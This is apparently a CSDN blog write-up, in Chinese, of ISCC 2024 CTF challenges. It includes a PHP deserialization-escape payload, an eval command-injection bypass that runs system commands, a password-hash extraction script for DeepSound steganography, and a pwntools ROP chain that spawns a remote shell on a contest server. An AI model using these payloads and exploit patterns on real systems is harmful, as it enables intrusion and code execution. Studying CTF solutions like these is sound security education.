ISCC擂台 2024 部分 wp

已于 2024-05-31 19:23:32 修改
阅读量837 收藏 19
点赞数 7
文章标签: ISCC 2024 擂台 wp 练武题 个人赛
于 2024-05-30 19:13:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77001831/article/details/139332146
版权

web

狂飙

打开容器发现是一个电视剧《狂飙》里边的经典片段,提示你输入经典台词。

直接找到代码界面。

代码链接为:101.200.138.180:9999/getevidence.php

<?php
include("./2024ISCC.php");
// 欢迎大家来到ISCC,本题大家将扮演《狂飙》中的警察,寻找关键证据,抓捕犯罪嫌疑人。
$code = file_get_contents(__FILE__);
highlight_string($code);

class police
{
  public $work;
  public $awarding = "salary";

  public function __construct($a)
  {
    $this ->work = $a;
  }
  
  public function __destruct()
  {
    echo "我是一名人民警察,打击违法犯罪义不容辞<br>";
    $this-> work = new suspect();
    echo $this-> work -> evidence_video;
    echo $this-> work -> evidence_fingerprint;
  }
}

class suspect
{
  private $video;
  private $fingerprint;

  public function __get($name)
  {
    if($name == "evidence_video")
    {
      echo "property.transactions怎么可能这么容易获得呢?<br>";
    }
    else
    {
      echo "blood.fingerprint怎么可能这么容易获得呢?<br>";
    }
  }

  public function __toString()
  {
    $this -> video = "property.transactions";
    $this -> fingerprint = "blood.fingerprint";
    return "差点就让你获得证据了<br>";
  }
}

class tools
{
  public $object;
  private $camera = 0;
  private $technology = 0;

  public function __construct()
  {
    echo "使用camera和technology可以找到蛛丝马迹<br>";
  }

  public function __invoke()
  {
    $this -> camera = 1;
    $this -> technology = 1;
    echo $this->object;
  }
}

function filter($name)
{
  $safe = "evil";
  $name = str_replace($safe, "light", $name);
  return $name;
}

if (isset($_GET["evidence"]))
{
  $a = filter(serialize(new police($_GET["evidence"])));
  echo $a;
  global $tips;
  if((strpos($a, $tips) !== false) && unserialize($a) -> awarding == "pennant")
  {
    global $flag;
    echo $flag;
  }
}
?>

经分析为反序列化字符串逃逸构造32个evil即可逃逸,然后根据给出的线索得到tips写入payload即可所以直接构造payload

?evidence=O:5:%22tools%22:3:{s:6:%22object%22;O:7:%22suspect%22:2:{s:14:%22suspectvideo%22;s:21:%22property.transactions%22;s:20:%22suspectfingerprint%22;s:17:%22blood.fingerprint%22;}s:13:%22toolscamera%22;i:1;s:17:%22toolstechnology%22;i:1;}evilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevilevil%22;s:8:%22awarding%22;s:7:%22pennant%22;}

 直接拿到flag的值。

ISCC{nSpyRnAR1ps2xKwa}

最喜欢的一集

 首先打开容器,提示你去welcome.php下,直接访问,发现是代码审计的题目,先看代码的意思。

先是传入ISCC参数,然后转换成小写赋值给str,用一个foreach循环遍历上边的数组,第一个绕过就是strpos函数,用来匹配前一个字符串在后一个字符串中的位置。第二个就是正则匹配。

然后用eval()函数去执行里边的字符串执行命令操作。

http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('ls /');")

 用${0}截断字符串的长度直接可以绕过正则匹配。接下来直接读取即可。发现cat、tac、more、都被过滤掉了。直接用tail即可。

http://101.200.138.180:34567/welcome.php?ISCC=eval("sys${0}tem('tail /flaaaaaaaaagggggg');")

 拿到flag。

ISCC{6mXz9rkC9JfMIoGh}

misc

重隐

直接下载附件发现就是一个音频和图片,图片直接拖拽到010里边发现就是好像里边有压缩包,直接进行分离发现压缩包解压,发现有密码。

接下来分析音频,直接拖拽到deepsound里边,发现需要密码。直接deepsound2john获取哈希值。网上有代码。

import logging
import os
import sys
import textwrap
 
def decode_data_low(buf):
  return buf[::2]
 
def decode_data_normal(buf):
  out = bytearray()
  for i in range(0, len(buf), 4):
    out.append((buf[i] & 15) << 4 | (buf[i + 2] & 15))
  return out
 
def decode_data_high(buf):
  out = bytearray()
  for i in range(0, len(buf), 8):
    out.append((buf[i] & 3) << 6     | (buf[i + 2] & 3) << 4 \
             | (buf[i + 4] & 3) << 2 | (buf[i + 6] & 3))
  return out
 
 
def is_magic(buf):
  # This is a more efficient way of testing for the `DSCF` magic header without
  # decoding the whole buffer
  return (buf[0] & 15)  == (68 >> 4) and (buf[2]  & 15) == (68 & 15) \
     and (buf[4] & 15)  == (83 >> 4) and (buf[6]  & 15) == (83 & 15) \
     and (buf[8] & 15)  == (67 >> 4) and (buf[10] & 15) == (67 & 15) \
     and (buf[12] & 15) == (70 >> 4) and (buf[14] & 15) == (70 & 15)
 
def is_wave(buf):
  return buf[0:4] == b'RIFF' and buf[8:12] == b'WAVE'
 
 
def process_deepsound_file(f):
  bname = os.path.basename(f.name)
  logger = logging.getLogger(bname)
 
  # Check if it's a .wav file
  buf = f.read(12)
  if not is_wave(buf):
    global convert_warn
    logger.error('file not in .wav format')
    convert_warn = True
    return
  f.seek(0, os.SEEK_SET)
  # Scan for the marker...
  hdrsz = 104
  hdr = None
  while True:
    off = f.tell()
    buf = f.read(hdrsz)
    if len(buf) < hdrsz: break
    if is_magic(buf):
          hdr = decode_data_normal(buf)
          logger.info('found DeepSound header at offset %i', off)
          break
    f.seek(-hdrsz + 1, os.SEEK_CUR)
  if hdr is None:
    logger.warn('does not appear to be a DeepSound file')
    return
  # Check some header fields
  mode = hdr[4]
  encrypted = hdr[5]
  modes = {2: 'low', 4: 'normal', 8: 'high'}
  if mode in modes:
    logger.info('data is encoded in %s-quality mode', modes[mode])
  else:
    logger.error('unexpected data encoding mode %i', modes[mode])
    return
  if encrypted == 0:
    logger.warn('file is not encrypted')
    return
  elif encrypted != 1:
    logger.error('unexpected encryption flag %i', encrypted)
    return
  sha1 = hdr[6:6+20]
  print('%s:$dynamic_1529$%s' % (bname, sha1.hex()))
if __name__ == '__main__':
  import argparse
  parser = argparse.ArgumentParser()
  parser.add_argument('--verbose', '-v', action='store_true')
  parser.add_argument('files', nargs='+', metavar='file',
    type=argparse.FileType('rb', bufsize=4096))
  args = parser.parse_args()
  if args.verbose:
    logging.basicConfig(level=logging.INFO)
  else:
    logging.basicConfig(level=logging.WARN)
  convert_warn = False
  for f in args.files:
    process_deepsound_file(f)
  if convert_warn:
    print(textwrap.dedent.rstrip(), file=sys.stderr)

 直接放到kail里边进行。

爆破出密码为teenager

导出文件为

直接在线找文字盲水印提取工具。[文本隐水印 (guofei.site)](https://www.guofei.site/pictures_for_blog/app/text_watermark/v1.html)

base64解码得到一部分flag。74_re2l_w4t3rm4rk}。

再分析音频文件发现是手机拨号的声音。

直接在线DTMF Decoder在线解码,再对照手机上的九键找到对应的字母,拿到密码。

但是必须为大写。解压后拿到flag.txt,直接进行解码即可得到前半段flag的值。

所以flag的值为:ISCC{y0u_f1nd_t74_re2l_w4t3rm4rk}

pwn

curious

首先下载附件然后直接拖拽到IDA里边进行分析,先找到主函数,题目换了字典序列,将大小写反转,解码即可得到flag的值。

存在栈溢出,程序是静态编译。直接跑。

拿到flag的值。

ISCC{itHIyaLc8vuIrO8tHJylJlzw2oPgwxPpj2Jg}

脚本如下:

from pwn import *

from struct import pack

context.os='linux'

elf = ELF("./pwn1")

io = remote('182.92.237.102', 10031)

p = b''

p += pack('<Q', 0x000000000040f49e) 

p += pack('<Q', 0x00000000004c20e0) 

p += pack('<Q', 0x0000000000452af7) 

p += b'/bin//sh'

p += pack('<Q', 0x0000000000483b85) 

p += pack('<Q', 0x000000000040f49e)

p += pack('<Q', 0x00000000004c20e8) 

p += pack('<Q', 0x0000000000446ef9)

p += pack('<Q', 0x0000000000483b85)

p += pack('<Q', 0x0000000000401912) 

p += pack('<Q', 0x00000000004c20e0) 

p += pack('<Q', 0x000000000040f49e) 

p += pack('<Q', 0x00000000004c20e8) 

p += pack('<Q', 0x000000000040181f) 

p += pack('<Q', 0x00000000004c20e8) 

p += pack('<Q', 0x0000000000446ef9) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0)

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004788c0) 

p += pack('<Q', 0x00000000004012d3) 

payload = b"a" * 0x28 + p

io.send(b'oh1yes')

io.sendline(b'1')

io.sendline(payload)

io.interactive()

练武题部分wp请点击(个人网站)https://wangchaoran.fun/iscc-2024-%e7%bb%83%e6%ad%a6%e9%83%a8%e5%88%86wp/icon-default.png?t=N7T8https://wangchaoran.fun/iscc-2024-%e7%bb%83%e6%ad%a6%e9%83%a8%e5%88%86wp/

M's blog
关注
2022ISCC PWN
山高路远
07-05 2193
2022ISCC
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2312
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
2023线上ISCC 部分WP
DDD_Simple的博客
05-31 4535
通过网址打开游戏界面,发现鼠标右键失灵,无法直接打开页面源代码。随意打开一个已知页面的源代码,发现有view-source:字样,在游戏界面的网址前加上view-sourc:打开页面源代码。发现一串字符使用base64加密解密后是个假的flag有两个可打开文件,flag肯定在这两个中打开index.css文件未发现任何东西故接着打开另一个vue.global.js文件,文件内容很多,快捷键Ctrl+F全局搜索,发现base64字符串经过两次base64解密得到正确的flag。
ISCC 2024 部分wp
焦虑的焦虑
05-25 6724
ISCC 2024 部分wp
ISCC竞赛2024
2301_82000839的博客
05-25 1137
欢迎关注微信公众号交流。
ISCC 2022
njh18790816639的博客
06-13 5192
sim_treasure 简单的32位循环格式化字符串漏洞,位于栈上,无过滤\x00; from pwn import * context(log_level='debug',os='linux',arch='i386') binary = './sp1' r = remote('123.57.69.203',7010) #r = process(binary) elf = ELF(binary) #libc = elf.libc libc = ELF('./libc-2.27.so') offset
ISCC 2022 wp
akxnxbshai的博客
06-09 7821
ISCC 2022 部分目的解过程。
ISCC-2022 部分wp
qaq517384的博客
06-07 3197
目录Web冬奥会Misc单板小将苏翊鸣2022冬奥会藏在星空中的诗-1ReverseAmy's Code Web 冬奥会 $info[“year”]=2022,if比较的赋值,永真 0项值为0绕过array_search()函数,其他随意 payload: ?Information={"year":"a","items":[0,["1","2","3"],"1"]} Misc 单板小将苏翊鸣 改图片高度得到二维码,扫码回答问 15942为压缩包密码 解压得到flag 2022冬奥会 吉祥物(压缩包密码)
ISCC-2019部分wp
Sea_Sand息禅
06-06 1430
web 1、web2 很清楚的提示,破解三位数的密码,同时也需使验证码正确,抓包进行爆破得到flag: 2、web1 <?php error_reporting(0); require 'flag.php'; $value = $_GET['value']; $password = $_GET['password']; $username = ''; for ($i =...
ISCC——部分wp
热门推荐
小元砸的博客
05-25 1万+
练武场 WEB: ISCC客服冲冲冲(一) 解思路: 1.打开后出现投票的页面 2.查看源码 发现可疑的function.js 3.function.js,js加密 var _0xodq='jsjiami.com.v6',_0x3e40=[_0xodq,'\x77\x35\x4c\x44\x6d\x38\x4f\x35\x77\x34\x46\x52\x77\x37\x33\x43\x73\x4d\x4f\x75\x61\x67\x3d\x3d','\x77\x35\x66\x44\x75\x79\x4e
[ISCC 2021]部分wp
Huamang的博客
05-05 3649
海市蜃楼-1 直接改后缀zip,搜flag直接找到 Retrieve the passcode 给了一堆三维的数据,提到了scatter,所以猜测是利用python来画散点图 1:3:1;1.25:3:1;1.5:3:1;1.75:3:1;2:3:1;2:2.75:1;2:2.5:1;2:2.25:1;2:2:1;2:1.75:1;2:1.5:1;1:2.25:1;1.25:2.25:1;1.5:2.25:1;1.75:2.25:1;1:1.5:1;1.25:1.5:1;1.5:1.5:1;1.75:1.5
ISCC部分pwn
qq_46441427的博客
05-25 2001
菜的扣脚刚刚入门堆的辣鸡pwn手 M78 整型漏洞,那个262有点迷,感觉是263 flag{N@x_addr_*EnaBleD%} game 随机数的,利用python脚本修改随机数种子 再写一个C脚本算随机数 成功拿到flag ISCC{this****&haobdvaljdnvoa0%bor} BOX 有libc,查看发现是libc2.27考虑tcache 写增删改查函数 泄露libc 计算malloc 最后劫持程序流 ISCC{angav**anva&77lnv
ISCC2024个人挑战赛WP-easyshell
qq_59468567的博客
05-30 388
还给了后面函数,先利用fmt泄露出canary和elf地址,之后ret2text。(非官方解,以下内容均互联网收集的信息和个人思路,仅供学习参考)有一个溢出和fmt漏洞。
ISCC-2020-WEB-What can images do-writep
Bcdlbgm的博客
05-31 344
WEB What can images do(文件包含+文件上传) 其实序列号也做出来了,没有立马写后来就忘了。当时立马写wp的只有这个一个。 目:http://101.201.126.95:7004/ 可以看到有个filename,参数是文件名。可以试试包含 ../../../../etc/passwd 成功但是不知道后台是include还是file_get_content。(这两者是有区别的可以参考这里,(链接11)) 然后我们再尝试一下php文件,可以看到包含了。那么就是include。 然
ISCC,Web:Pop2022
Pai_Space
05-25 1189
单用类无法执行获取 flag.php,但是可以通过 POP 链构造获取 源码 Happy New Year~ MAKE A WISH <?php echo 'Happy New Year~ MAKE A WISH<br>'; if(isset($_GET['wish'])){ @unserialize($_GET['wish']); } else{ $a=new Road_is_Long; highlight_file(__FILE__); } /****
ISCC之pwn1格式化字符串漏洞详解!
BadRer的博客
05-29 3480
作为小白的我,自从入了ctf的坑就再也没爬起来过,从无到有实在是很辛苦。仅以此片纪念我的青春。   直接进入正。这是个很明显的32位的格式化字符串漏洞。 上手就先leak出libc地址,求偏移得到system地址,(我也忘了有没有给lib库,反正我是在本地调试,拿自己的lib库。Ps:在本地可以通过./libc.so.6或者ldd --version 查看libc的版本号,作为新手还是
vue+springboot基于java的轻院网购商城管理系统_b534a毕业设计源码.zip
10-08
本系统基于B/S结构模式,采用idea开发环境,建模工具Visio,以及关系型数据库MySQL。 系统采用前后端分离框架vue进行开发。前端开发负责页面的编写及数据的渲染。后端开发负责提供API(接口)。采用了MVC(Model-View-Controller)架构风格,前后端采用指定的API接口进行交互 其主要开发包括后台数据库的设计建立,数据库维护以及前后端应用程序(WEB)设计编码。 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
音乐电影分享系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS).zip
最新发布
10-08
音乐电影分享系统 SSM毕业设计 源码+数据库+论文(JAVA+SpringBoot+Vue.JS) 启动教程:https://www.bilibili.com/video/BV1GK1iYyE2B
vue基于Spring Boot的宿舍管理系统qkc37 毕业设计源码.zip
10-08
本系统基于B/S结构模式,采用idea开发环境,建模工具Visio,以及关系型数据库MySQL。 系统采用前后端分离的模式进行开发。前端开发负责页面的编写及数据的渲染。后端开发负责提供API(接口)。前后端采用指定的API接口进行交互 其主要开发包括后台数据库的设计建立,数据库维护以及前后端应用程序(WEB)设计编码。 前端:vue.js+ElementUI 开发工具:IDEA 或者eclipse都支持 编程语言: java 框架:springboot 数据库: mysql 版本不限 数据库工具:Navicat/SQLyog都可以
ISCC2024计算flask的pin值
05-03
ISCC2024是一种用于对数字内容进行哈希的算法,它可以生成一个固定长度的哈希值。而pin值是一个与硬件相关的特殊值,用于保证运行在特定硬件上的程序不被恶意修改或运行在未授权的硬件上。 由于ISCC2024是一种数字哈希算法,与flask框架和pin值并没有直接的关联。如果您需要计算flask的pin值,可能需要考虑其他方法。可以提供更具体的信息,以便我更好地回答您的问
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值